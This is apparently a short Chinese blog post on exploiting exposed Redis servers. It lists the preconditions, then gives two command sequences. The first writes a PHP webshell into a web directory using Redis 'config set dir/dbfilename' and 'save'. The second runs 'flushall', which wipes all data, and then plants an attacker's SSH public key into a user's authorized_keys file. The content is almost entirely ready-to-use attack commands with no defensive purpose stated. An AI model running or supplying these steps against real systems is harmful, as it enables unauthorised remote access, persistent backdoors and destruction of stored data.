redis安全利用

redis安全利用

利用前提

  • redis没有设置登陆密码,或者已经知道了redis的密码信息
  • 对应的目录有权限,redis以root权限启动或者目标目录的权限为777

写webshell

  • 开了web并且知道路径(比如:phpinfo)
  • 连接上redis控制台 执行如下命令
    config set dir /home/wwwroot/default/
    config set dbfilename redis.php
    set webshell "<?php phpinfo(); ?>"
    save

SSH远程连接

  • 先生成本地的公私密钥

    ssh-keygen -t rsa
    (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
    
  • 先清空缓存和设置生成文件路径

    redis-cli -h 172.17.0.2 flushall
    cat foo.txt | redis-cli -h 172.17.0.2 -x set crackit
    redis-cli -h 172.17.0.2
    config set dir /home/yzy/.ssh/
    config set dbfilename "authorized_keys"
    save
    
  • 注意:此种方法需要先清空全部缓存,比较暴力哦!!

发表评论

电子邮件地址不会被公开。 必填项已用*标注